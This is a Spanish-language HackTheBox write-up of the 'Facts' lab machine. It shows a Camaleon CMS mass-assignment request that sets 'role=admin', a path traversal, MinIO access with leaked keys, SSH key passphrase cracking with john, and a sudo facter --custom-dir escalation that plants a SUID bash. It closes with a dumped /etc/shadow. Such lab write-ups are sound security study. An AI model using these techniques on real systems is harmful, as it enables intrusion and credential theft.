HackTheBox - Facts

sckull — Sat, 06 Jun 2026 00:00:00 +0000

En Factor explotamos dos vulnerabilidades en Camaleon CMS que permitieron escalar privilegios y lectura de archivos locales. Tambien, se obtuvo acceso a MinIO y a la clave privada de un usuario para SSH, permitiendo el acceso a la maquina. Finalmente escalamos privilegios con la ejecucion de un script privilegiado.

Nombre	Facts
OS	Linux
Puntos	20
Dificultad	Easy
Fecha de Salida	2026-01-31
IP	10.129.17.99
Maker	LazyTitan33
Rated	{ "type": "bar", "data": { "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"], "datasets": [{ "label": "User Rated Difficulty", "data": [117, 160, 302, 87, 43, 11, 8, 2, 1, 11], "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"] }] }, "options": { "scales": { "xAxes": [{"display": false}], "yAxes": [{"display": false}] }, "legend": {"labels": {"fontColor": "white"}}, "responsive": true } }

Recon

nmap

nmap muestra multiples puertos abiertos: http (80), Golang-http (54321) y ssh (22).

# Nmap 7.95 scan initiated Sat Jan 31 22:56:58 2026 as: /usr/lib/nmap/nmap --privileged -p22,80,54321 -sV -sC -oN nmap_scan 10.129.17.99
Nmap scan report for 10.129.17.99
Host is up (0.067s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)
|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)
80/tcp    open  http    nginx 1.26.3 (Ubuntu)
|_http-server-header: nginx/1.26.3 (Ubuntu)
|_http-title: Did not follow redirect to http://facts.htb/
54321/tcp open  http    Golang net/http server
|_http-server-header: MinIO
|_http-title: Did not follow redirect to http://10.129.17.99:9001
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 303
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18900689758BBD93
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 01 Feb 2026 04:57:21 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/nice ports,/Trinity.txt.bak</Resource><RequestId>18900689758BBD93</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   GenericLines, Help, RTSPRequest, SSLSessionReq: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 400 Bad Request
|     Accept-Ranges: bytes
|     Content-Length: 276
|     Content-Type: application/xml
|     Server: MinIO
|     Strict-Transport-Security: max-age=31536000; includeSubDomains
|     Vary: Origin
|     X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
|     X-Amz-Request-Id: 18900685C12CF014
|     X-Content-Type-Options: nosniff
|     X-Xss-Protection: 1; mode=block
|     Date: Sun, 01 Feb 2026 04:57:05 GMT
|     <?xml version="1.0" encoding="UTF-8"?>
|     <Error><Code>InvalidRequest</Code><Message>Invalid Request (invalid argument)</Message><Resource>/</Resource><RequestId>18900685C12CF014</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Vary: Origin
|     Date: Sun, 01 Feb 2026 04:57:05 GMT
|_    Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port54321-TCP:V=7.95%I=7%D=1/31%Time=697EDD20%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20
SF:text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\
SF:x20Request")%r(GetRequest,2B0,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nAc
SF:cept-Ranges:\x20bytes\r\nContent-Length:\x20276\r\nContent-Type:\x20app
SF:lication/xml\r\nServer:\x20MinIO\r\nStrict-Transport-Security:\x20max-a
SF:ge=31536000;\x20includeSubDomains\r\nVary:\x20Origin\r\nX-Amz-Id-2:\x20
SF:dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8\r\nX-A
SF:mz-Request-Id:\x2018900685C12CF014\r\nX-Content-Type-Options:\x20nosnif
SF:f\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Sun,\x2001\x20Fe
SF:b\x202026\x2004:57:05\x20GMT\r\n\r\n<\?xml\x20version=\"1\.0\"\x20encod
SF:ing=\"UTF-8\"\?>\n<Error><Code>InvalidRequest</Code><Message>Invalid\x2
SF:0Request\x20\(invalid\x20argument\)</Message><Resource>/</Resource><Req
SF:uestId>18900685C12CF014</RequestId><HostId>dd9025bab4ad464b049177c95eb6
SF:ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>")%r(HTTPOptions,5
SF:9,"HTTP/1\.0\x20200\x20OK\r\nVary:\x20Origin\r\nDate:\x20Sun,\x2001\x20
SF:Feb\x202026\x2004:57:05\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSP
SF:Request,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,2CB,"HTTP/1\.0\x2
SF:0400\x20Bad\x20Request\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x2
SF:0303\r\nContent-Type:\x20application/xml\r\nServer:\x20MinIO\r\nStrict-
SF:Transport-Security:\x20max-age=31536000;\x20includeSubDomains\r\nVary:\
SF:x20Origin\r\nX-Amz-Id-2:\x20dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af
SF:9251148b658df7ac2e3e8\r\nX-Amz-Request-Id:\x2018900689758BBD93\r\nX-Con
SF:tent-Type-Options:\x20nosniff\r\nX-Xss-Protection:\x201;\x20mode=block\
SF:r\nDate:\x20Sun,\x2001\x20Feb\x202026\x2004:57:21\x20GMT\r\n\r\n<\?xml\
SF:x20version=\"1\.0\"\x20encoding=\"UTF-8\"\?>\n<Error><Code>InvalidReque
SF:st</Code><Message>Invalid\x20Request\x20\(invalid\x20argument\)</Messag
SF:e><Resource>/nice\x20ports,/Trinity\.txt\.bak</Resource><RequestId>1890
SF:0689758BBD93</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3f
SF:d1af9251148b658df7ac2e3e8</HostId></Error>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 31 22:57:29 2026 -- 1 IP address (1 host up) scanned in 30.84 seconds

Web Site

El sitio web nos redirige al dominio facts.htb el cual agregamos al archivo /etc/hosts.

❯ curl -sI 10.129.17.99
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.26.3 (Ubuntu)
Date: Sun, 01 Feb 2026 04:59:22 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://facts.htb/

❯

Se menciona que la pagina esta dedicada a trivia.

Existen distintos paginas donde se observan nombres de posibles usuarios.

Directory Brute Forcing

Ejecutamos feroxbuster filtrando respuests 404, este mostro nuevas paginas.

❯ feroxbuster -u http://facts.htb/ -w $CM -C 404
                                                                                                                                                                                        
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://facts.htb/
 🚩  In-Scope Url          │ facts.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET      124l      552w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET      121l      443w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      114l      532w     6685c http://facts.htb/400
200      GET      114l      371w     4836c http://facts.htb/404
200      GET      114l      574w     7918c http://facts.htb/500
302      GET        0l        0w        0c http://facts.htb/admin => http://facts.htb/admin/login
302      GET        0l        0w        0c http://facts.htb/admin.pl => http://facts.htb/admin/login
302      GET        0l        0w        0c http://facts.htb/admin.cgi => http://facts.htb/admin/login
302      GET        0l        0w        0c http://facts.htb/admin.php => http://facts.htb/admin/login
200      GET        0l        0w        0c http://facts.htb/ajax
200      GET       19l      124w     9799c http://facts.htb/captcha
500      GET      114l      574w     7918c http://facts.htb/error
200      GET       66l      519w    44082c http://facts.htb/randomfacts/primary-question-mark.png
404      GET        2l        9w        -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        7l       10w      162c http://facts.htb/randomfacts/
200      GET      281l     1177w    19593c http://facts.htb/page
200      GET      151l      507w    11308c http://facts.htb/post
200      GET        1l       12w       99c http://facts.htb/robots.txt
200      GET        1l        2w       33c http://facts.htb/robots
200      GET        8l       11w      183c http://facts.htb/rss
200      GET       69l      448w    30396c http://facts.htb/randomfacts/logopage2.png
200      GET      271l     1166w    19187c http://facts.htb/search
200      GET      129l      132w     3508c http://facts.htb/sitemap
200      GET      129l      132w     3508c http://facts.htb/sitemap.xml
500      GET      114l      574w     7918c http://facts.htb/sitemap.gz
200      GET        1l        4w       73c http://facts.htb/up
❯

Camaleon CMS

Un login para usuarios donde es posible la creacion de cuentas de usuarios.

Ademas, en los headers de la respuesta se indica camaleon_cms.

HTTP/1.1 200 OK
Server: nginx/1.26.3 (Ubuntu)
Date: Sun, 01 Feb 2026 05:15:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
x-frame-options: SAMEORIGIN
x-xss-protection: 0
x-content-type-options: nosniff
x-permitted-cross-domain-policies: none
referrer-policy: strict-origin-when-cross-origin
link: </assets/camaleon_cms/admin/admin-basic-manifest-4a345527ab92050e4ecb0f7d9d30c6090c451165b9ffaf00266b2aa5231cda7f.css>; rel=preload; as=style; nopush,</assets/camaleon_cms/admin/admin-basic-manifest-3896669961ec58669ff8c38eff8ddbde23935fca25fed539252f7705c2b073d1.js>; rel=preload; as=script; nopush
etag: W/"241dcfb2139a8d6436fc8fd3dc9fde35"
cache-control: max-age=0, private, must-revalidate
set-cookie: _factsapp_session=dnPILYaLhxbi5UVZAn3m1Gj30WQ7U2sEGzEk9qYr1Uwv2cU8DirGBpXe8w1pkIQNJx%2BtrITJyIf38AUy067hFPAMnkzHuyciBP0HY9flH2ABXc5csi8jRDCNWYpJOod%2F6zO4tPlcovoesQr%2B0OrEtiiD7pnCDGEelwqDPfKtKLNWObB6P%2FLw84%2BF6837P2GhXciTa7%2Frj4ZIT9SBRfPtyi5f4EIIjzeCpLC9uOb%2FdHaiJ4rlYpS%2FTXmBJEMTSkX6LhBJjF7ksWdquSx5u4FUYAhnqpdHm368NW%2BT%2BrjJ6U0vdVOQAdEoFuBJHvYqNkjW%2BxSOuvS7bUJa9vvvoUSEsGssS%2BHw4EzU5HzoeGVCVOcdaIsiHe%2FBP2Y%3D--Q19qs%2Fysx8NKIhUA--ZC35qa6aAv9qLyUnNqjUVg%3D%3D; path=/; httponly; samesite=lax
x-request-id: f1c61d90-21c8-45ca-b05b-dd2d2d20ba7a
x-runtime: 0.078869
Content-Length: 3896

<!DOCTYPE html>
<html lang="en" class="body-full-height">
<head>
# [... cut ..]

Tras el registro de un usuario identificamos la version 2.9.0.

Puerto 54321

En el puerto 54321 se indica Servidor MinIO. Tras realizar una solicitud muestra acceso denegado.

❯ curl -sI 10.129.17.99:54321
HTTP/1.1 400 Bad Request
Accept-Ranges: bytes
Content-Length: 213
Content-Type: application/xml
Server: MinIO
Vary: Origin
Date: Sun, 01 Feb 2026 05:25:43 GMT

❯ 
❯ curl 10.129.17.99:54321
<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied.</Message><Resource>/</Resource><RequestId>1890082748774CF9</RequestId><HostId>dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8</HostId></Error>
❯

Segun la documentacion, se indica que necesita credenciales para administrar el bucket. Si se agrega el dominio, este muestra una redireccion al puerto 9001, el cual no esta expuesto.

HTTP/1.1 307 Temporary Redirect
Content-Type: text/html; charset=utf-8
Location: http://facts.htb:9001
Strict-Transport-Security: max-age=31536000; includeSubDomains
Vary: Origin
X-Amz-Id-2: dd9025bab4ad464b049177c95eb6ebf374d3b3fd1af9251148b658df7ac2e3e8
X-Amz-Request-Id: 1890080CBF6AD8B4
X-Content-Type-Options: nosniff
X-Xss-Protection: 1; mode=block
Date: Sun, 01 Feb 2026 05:25:04 GMT
Content-Length: 57

<a href="http://facts.htb:9001">Temporary Redirect</a>.

Camaleon CMS - Privesc

La version de camaleon cms es afectada por la vulnerabilidad Privilege Escalation through a Mass Assignment. En Ruby, existe permit! el cual acepta un array completo sin siquiera verificar los datos, esto permitiria agregar otros parametros. En este caso, cuando la contrasena se cambia, esta es enviada en forma de un array.

def updated_ajax
    @user = current_site.users.find(params[:user_id])
    update_session = current_user_is?(@user)
    @user.update(params.require(:password).permit!)       # VULNERABLE
    render inline: @user.errors.full_messages.join(', ')
    # keep user logged in when changing their own password
    update_auth_token_in_cookie @user.auth_token if update_session && @user.saved_change_to_password_digest?
end

Si intentamos cambiar la contrasena a nuestro usuario podemos observar el envio de un array.

POST /admin/users/5/updated_ajax HTTP/1.1
Host: facts.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://facts.htb/admin/profile/edit
X-CSRF-Token: AzijLgbTlI2uqPtTcpIvbH36ZEeOAzcmQhqaxNELE7xwSZUnVldSQTwTaDzN1vlpiMeF4W0EZbvgHbLyM472qQ
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 200
Origin: http://facts.htb
Connection: keep-alive
Cookie: _factsapp_session=xAAGLpkuIR315czed7PtbOoSKB7nR8WslO9ZCq5HnqDSBUYNernJSimv0fnLG%2BDZ%2F5XCUxlSxUU8q5N4D%2FRvi19i3bguc13YqtFID0pEcDn7Fkx5Y0UvQiwjX9Qy6YuWzhuwnE8AtdAk9onBAR3%2F4nbB5UBylRLEywwINtlTvyW9%2ByEn38dy%2BMoqhKuG0VCbeAFV0fNzXQJRX3Rka%2FOq3FvohxV3csBsG8jDmuiI2gKDkrsucpGptnDuSZ%2FMmuQBRstsdi%2B13brb3m1EZzwax%2F6PDVb6Xnws1OEVvEHAiR13JFCKNwrk%2BiINojG6ylRbbQGl80LMZ9lfopVSTlYaaIY4k7ym%2Bs0x4n8OYmIqeABrIfsLWY4CtdN6xzj3KJkw7w0OrLulidYTb0hp6A%3D%3D--vJEeMngF60oOAPKx--iSr8YvwyXmloLiklNKAKqQ%3D%3D; auth_token=eQ5hBZ8DH1rHYMT2_nHoEA&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A140.0%29+Gecko%2F20100101+Firefox%2F140.0&10.10.15.154
Priority: u=0

_method=patch&authenticity_token=AzijLgbTlI2uqPtTcpIvbH36ZEeOAzcmQhqaxNELE7xwSZUnVldSQTwTaDzN1vlpiMeF4W0EZbvgHbLyM472qQ&password%5Bpassword%5D=1234567890&password%5Bpassword_confirmation%5D=1234567890

El array es password.

`1`	`password[password]=1234567890&password[password_confirmation]=1234567890`

En el registro se observa la definicion de roles para el usuario que por default es client. Para un usuario administrador el rol es admin.

Admin

Realizamos el cambio de contrasena agregando el rol admin a nuestro usuario. Interceptamos la solicitud, editamos y enviamos.

`1`	`password[password]=sckull123&password[password_confirmation]=sckull123&password[role]=admin`

Tras el cambio, se muestra que nuestro rol es administrador.

En la configuracion se define un servicio de almacenamiento, indicando el puerto 54321 donde MinIO esta corriendo.

Path Traversal

Tambien encontramos que existe la vulnerabilidad Arbitrary path traversal que afecta a esta version la cual permite la lectura de archivos. En este caso /etc/passwd donde encontramos que existen los usuarios trivia y wiliam.

MinIO

Con el cliente de MinIO: mc, podemos definir las “credenciales” encontradas para el bucket randomfacts.

1
2
3

❯ ./mc alias set randomfacts http://facts.htb:54321 AKIA956E61DAC1233FA8 cVaZKEQrFDgW6NmwZIiYYEl4vwzhuynSg9siYEEr
Added `randomfacts` successfully.
❯

admin info devuelve informacion del servicio.

❯ ./mc admin info randomfacts
╭───────────────────────────╮                                                                                                  
│  MinIO Cluster: ● Online  │                                                                                                  
╰───────────────────────────╯                                                                                                  
                                                                                                                               
Capacity                                                                                                                       
╭───────────────────────────────────────────────────────────────────────────────╮                                              
│  Used:  5.4 GiB / 7.2 GiB  [██████████████████████████████░░░░░░░░░░]  74.4%  │                                              
│  Free:  1.8 GiB                                                               │                                              
╰───────────────────────────────────────────────────────────────────────────────╯                                              
                                                                                                                               
Servers                                                                                                                        
╭─────────────────────────────────────────────────────────────────────────────────────────────────────────╮                    
│  ●  facts.htb:54321  │  Uptime: 2 hours   │  Drives: 1/1  │  Pool: 1  │  Version: 2025-09-07T16:13:09Z  │                    
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────╯                    
                                                                                                                               
Pools                                                                                                                          
╭─────────────────────────────────────────────────────╮                                                                        
│  Pool  │  Usage            │  Stripe Size  │  Sets  │                                                                        
│  1st   │  74.4% (7.2 GiB)  │  1            │  1     │                                                                        
╰─────────────────────────────────────────────────────╯                                                                        
                                                                                                                               
Data Summary                                                                                                                   
╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│  Used: 36 MiB  │  Buckets: 2  │  Objects: 2,077  │  Delete Markers: 0  │  Drives: 1 online / 0 offline  │  Erasure Code: 0  │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
                                                                                                                               
❯

ls nos permite listar los archivos dentro del bucket.

❯ ./mc ls randomfacts/
[2025-09-11 06:06:52 CST]     0B internal/
[2025-09-11 06:06:52 CST]     0B randomfacts/
❯

tree muestra la lista de directorios.

❯ ./mc tree randomfacts
randomfacts
├─ internal
│  ├─ .bundle
│  │  └─ cache
│  │     └─ compact_index
│  │        └─ rubygems.org.443.29b0360b937aa4d161703e6160654e47
│  │           ├─ info-etags
│  │           ├─ info-special-characters
│  │           └─ info
│  ├─ .cache
│  └─ .ssh
└─ randomfacts
   └─ thumb
❯

Encontramos una clave privada y el archivo authorized_keys.

❯ ./mc ls randomfacts/internal
[2026-01-08 12:45:13 CST]   220B STANDARD .bash_logout
[2026-01-08 12:45:13 CST] 3.8KiB STANDARD .bashrc
[2026-01-08 12:47:17 CST]    20B STANDARD .lesshst
[2026-01-08 12:47:17 CST]   807B STANDARD .profile
[2026-02-01 00:36:27 CST]     0B .bundle/
[2026-02-01 00:36:27 CST]     0B .cache/
[2026-02-01 00:36:27 CST]     0B .ssh/
❯ ./mc ls randomfacts/internal/.ssh
[2026-01-31 21:40:29 CST]    82B STANDARD authorized_keys
[2026-01-31 21:40:29 CST]   464B STANDARD id_ed25519
❯ ./mc cat randomfacts/internal/.ssh/id_ed25519
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCbydJFSr
iLHvxfHSUmPz85AAAAGAAAAAEAAAAzAAAAC3NzaC1lZDI1NTE5AAAAIPoYuLqG9SDYfx1n
YLxkUGDcxAFRa9rFdyvFg3wEuD7pAAAAoBCJGRdc3UohfJqfPIgxxVL1UPwrBO4n6V5mvn
Wa74u0m6NjfbZJxYqOpft5uNTsak/i66vaUEKJr/booY6UVma4bpiHlfs4k4q22URUSMY7
LGSkfpcxFrOUACmizvctlmS3sveanf1OeDwI0vxdAyCb0bX/VC+1EH46rRSurXFxHfq3lv
OHlGB9cMGsl9Dfd0xyzMNCIqce8Cngw45Cdzo=
-----END OPENSSH PRIVATE KEY-----
❯ ./mc cat randomfacts/internal/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPoYuLqG9SDYfx1nYLxkUGDcxAFRa9rFdyvFg3wEuD7p 
❯

La clave privada esta protegida.

❯ chmod 600 id_ed25519
❯ ssh trivia@facts.htb -i id_ed25519
Enter passphrase for key 'id_ed25519': 
trivia@facts.htb's password: 

❯

Crack The Hash

Obtuvimos el hash mediante ssh2john y crackeamos este con john.

❯ ssh2john id_ed25519
id_ed25519:$sshng$6$16$9bc9d2454ab88b1efc5f1d25263f3f39$290$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000109bc9d2454ab88b1efc5f1d25263f3f390000001800000001000000330000000b7373682d6564323535313900000020fa18b8ba86f520d87f1d6760bc645060dcc401516bdac5772bc5837c04b83ee9000000a0108919175cdd4a217c9a9f3c8831c552f550fc2b04ee27e95e66be759aef8bb49ba3637db649c58a8ea5fb79b8d4ec6a4fe2ebabda504289aff6e8a18e945666b86e988795fb38938ab6d9445448c63b2c64a47e973116b3940029a2cef72d9664b7b2f79a9dfd4e783c08d2fc5d03209bd1b5ff542fb5107e3aad14aead71711dfab796f38794607d70c1ac97d0df774c72ccc34222a71ef029e0c38e42773a$24$130
❯ ssh2john id_ed25519 > hash
❯ john hash --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 24 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonballz      (id_ed25519)     
1g 0:00:01:40 DONE (2026-02-01 01:22) 0.009940g/s 31.80p/s 31.80c/s 31.80C/s grecia..imissu
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
❯

User - Trivia

Utilizamos la frase para la clave privada con el usuario trivia por SSH logrando obtener una shell.

❯ ssh trivia@facts.htb -i id_ed25519
Enter passphrase for key 'id_ed25519': 
Last login: Wed Jan 28 16:17:19 UTC 2026 from 10.10.14.4 on ssh
Welcome to Ubuntu 25.04 (GNU/Linux 6.14.0-37-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun Feb  1 07:25:12 AM UTC 2026

  System load:           0.0
  Usage of /:            73.5% of 7.28GB
  Memory usage:          19%
  Swap usage:            0%
  Processes:             221
  Users logged in:       1
  IPv4 address for eth0: 10.129.17.99
  IPv6 address for eth0: dead:beef::250:56ff:feb0:ced


0 updates can be applied immediately.

trivia@facts:~$ whoami;id;pwd
trivia
uid=1000(trivia) gid=1000(trivia) groups=1000(trivia)
/home/trivia
trivia@facts:~$

Privesc

El usuario puede ejecutar como root el script de ruby facter.

trivia@facts:~$ sudo -l -l
Matching Defaults entries for trivia on facts:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User trivia may run the following commands on facts:

Sudoers entry: /etc/sudoers
    RunAsUsers: ALL
    Options: !authenticate
    Commands:
	/usr/bin/facter
trivia@facts:~$ file /usr/bin/facter
/usr/bin/facter: Ruby script, ASCII text executable
trivia@facts:~$ cat /usr/bin/facter
#!/usr/bin/ruby
# frozen_string_literal: true

require 'pathname'
require 'facter/framework/cli/cli_launcher'

Facter::OptionsValidator.validate(ARGV)
processed_arguments = CliLauncher.prepare_arguments(ARGV)

CliLauncher.start(processed_arguments)
trivia@facts:~$

La ejecucion nos muestra informacion del sistema.

trivia@facts:~$ sudo facter
disks => {
  sda => {
    model => "Virtual disk",
    serial => "6000c2967e20ea19ef110cf6b958a20e",
    size => "10.00 GiB",
    size_bytes => 10737418240,
    type => "ssd",
    vendor => "VMware",
    wwn => "0x6000c2967e20ea19ef110cf6b958a20e"
  }
}
dmi => {
  bios => {
    release_date => "11/12/2020",
    vendor => "Phoenix Technologies LTD",
    version => "6.00"
  },
  board => {
    manufacturer => "Intel Corporation",
    product => "440BX Desktop Reference Platform",
    serial_number => "None"
  },
  chassis => {
    asset_tag => "No Asset Tag",
    type => "Other"
  },
  manufacturer => "VMware, Inc.",

# [ .. cut .. ]

system_uptime => {
  days => 0,
  hours => 3,
  seconds => 13719,
  uptime => "3:48 hours"
}
timezone => UTC
virtual => vmware
trivia@facts:~$

Especificamos la flag --custom-dir en el directorio actual donde creamos un “fact” o un archivo ruby con la ejecucion del comando whoami. Con dicha flag ejecutaria todos los archivos Ruby en el directorio.

Tras la ejecucion se muestra root como el usuario.

trivia@facts:~$ nano file.rb
trivia@facts:~$ cat file.rb 
system("whoami")
trivia@facts:~$ sudo facter --custom-dir=$(pwd) 
root
disks => {
  sda => {
# [ .. cut .. ]

Shell

Asignamos la creacion de una copia de bash con permisos SUID.

trivia@facts:~$ which bash
/usr/bin/bash
trivia@facts:~$ nano file.rb 
trivia@facts:~$ cat file.rb 
system("cp /usr/bin/bash /usr/bin/sc")
system("chmod u+s /usr/bin/sc")

trivia@facts:~$

La ejecucion creo la copia.

trivia@facts:~$ sudo facter --custom-dir=$(pwd) | head
disks => {
  sda => {
    model => "Virtual disk",
    serial => "6000c2967e20ea19ef110cf6b958a20e",
    size => "10.00 GiB",
    size_bytes => 10737418240,
    type => "ssd",
    vendor => "VMware",
    wwn => "0x6000c2967e20ea19ef110cf6b958a20e"
  }
trivia@facts:~$ ls -lah /usr/bin/sc
-rwsr-xr-x 1 root root 1.7M Feb  1 07:43 /usr/bin/sc
trivia@facts:~$

Con ello logramos escalar privilegios, obtener las flags user.txt y root.txt.

trivia@facts:~$ /usr/bin/sc -p
sc-5.2# whoami
root
sc-5.2# cd /root
sc-5.2# ls
minio-binaries	ministack  root.txt  snap
sc-5.2# cat root.txt
7ab46d7606afb1571fe684300a50c3c0
sc-5.2# cat /home/william/user.txt
407fc88c5e29ad88876774bb2e2d48ca
sc-5.2#

Dump Hashes

Realizamos la lectura del archivo /etc/shadow.

sc-5.2# cat /etc/shadow
root:$y$j9T$7gs6EMa6c.zpFgKM3Grtz.$q8L7RyD.tdOf9DEhsqmEYBdKBrmxJ60ItpltO/x2nSB:20342:0:99999:7:::
daemon:*:20003:0:99999:7:::
bin:*:20003:0:99999:7:::
sys:*:20003:0:99999:7:::
sync:*:20003:0:99999:7:::
games:*:20003:0:99999:7:::
man:*:20003:0:99999:7:::
lp:*:20003:0:99999:7:::
mail:*:20003:0:99999:7:::
news:*:20003:0:99999:7:::
uucp:*:20003:0:99999:7:::
proxy:*:20003:0:99999:7:::
www-data:*:20003:0:99999:7:::
backup:*:20003:0:99999:7:::
list:*:20003:0:99999:7:::
irc:*:20003:0:99999:7:::
_apt:*:20003:0:99999:7:::
nobody:*:20003:0:99999:7:::
systemd-network:!*:20003::::::
usbmux:!:20003::::::
systemd-timesync:!*:20003::::::
messagebus:!:20003::::::
systemd-resolve:!*:20003::::::
pollinate:!:20003::::::
polkitd:!*:20003::::::
syslog:!:20003::::::
uuidd:!:20003::::::
tcpdump:!:20003::::::
tss:!:20003::::::
landscape:!:20003::::::
fwupd-refresh:!*:20003::::::
sshd:!:20338::::::
trivia:$y$j9T$1fYkuzD9.m5y7SwWSTUqh/$hb29dYfEthOUaEZr8D1GriIfSkeu8YeiI2WWxMmoiG0:20342:0:99999:7:::
william:$y$j9T$L/LMpuHMall7H5uzpS/mL1$L1EJ9y7BdcE10UIxBSow2eStbt1SefLToaTh4hDacD2:20461:0:99999:7:::
_laurel:!:20479::::::
sc-5.2#

CVE-2025-2304 on sckull